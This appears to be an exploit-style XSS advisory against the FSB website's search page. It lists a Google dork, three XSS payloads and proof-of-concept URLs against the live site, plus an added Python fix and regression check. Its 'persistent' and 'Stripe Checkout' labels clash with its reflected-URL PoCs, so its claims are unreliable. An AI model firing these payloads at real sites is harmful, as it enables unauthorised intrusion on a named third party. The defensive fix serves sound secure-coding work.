-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
This section should be removed upon publication
This site is owned by the Federal Security Service of the Russian Federation.
This site has a security issue with an XSS vulnerability.
We have reported to this site multiple times that it has a security issue, and it has ignored our report.
We want to make sure to log and report this security issue.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*
/*!
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=
- # DATE: 2024-11-29
- # SECURITY RESEARCHER: E1.Coders
- # VENDOR: FSB [ http://www.fsb.ru/ ]
- # SOFTWARE LINK: http://www.fsb.ru/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
*/
### -- [ Info: ]
[i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.
[i] Vulnerable parameter(s): sh.htm?query= < AND > /fsb/sh.htm?query=
### -- [ Impact: ]
[~] Injection of malicious JavaScript code and the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]
http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E
http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E
http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E
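A server-side fix for this class of reflection, shown as an added example that is not part of the original advisory or the site's code: the `query` value is encoded for each output context, and a regression check parses the rendered page to confirm the payloads listed above add no tags or attributes. The template, function names and the three reflection contexts are assumptions, since the advisory does not show the page markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Payloads copied from the advisory's "Payloads" section, used as regression input.
PAYLOADS = [
    '`"\'><img src=xxx:x \\x22onerror=javascript:alert(1)>',
    '"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />',
    '`"\'><img src=xxx:x onerror\\x09=javascript:alert(1)>',
]

# Hypothetical template: the real page markup is not shown in the advisory.
TEMPLATE = (
    '<form action="/fsb/sh.htm"><input name="query" value="{attr}"></form>'
    '<p>Results for: {body}</p>'
    '<a href="/fsb/sh.htm?query={url}">permalink</a>'
)

def render_search_page(query: str) -> str:
    """Reflect the query with an encoder matched to each output context."""
    return TEMPLATE.format(
        attr=html.escape(query, quote=True),  # quoted attribute value
        body=html.escape(query, quote=True),  # element text
        url=html.escape(quote(query, safe=""), quote=True),  # URL component in href
    )

def render_unescaped(query: str) -> str:
    """The flawed pattern, for comparison: raw interpolation into markup."""
    return TEMPLATE.format(attr=query, body=query, url=query)

class _Shape(HTMLParser):
    """Records every start tag and its attribute names."""
    def __init__(self):
        super().__init__()
        self.seen = []
    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, tuple(name for name, _ in attrs)))

def markup_shape(page: str):
    parser = _Shape()
    parser.feed(page)
    parser.close()
    return parser.seen

# Shape of the page for a harmless query; user input must never change it.
BASELINE = markup_shape(render_search_page("test"))

def is_neutralised(query: str) -> bool:
    return markup_shape(render_search_page(query)) == BASELINE
```

Because the stored or reflected value only ever reaches the browser in encoded form, the same check can run in CI against every template that echoes `query`.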
### -- [ Contacts: ]
[+] E-Mail: E1.Coders@Mail.Ru
[+] GitHub: @e1coders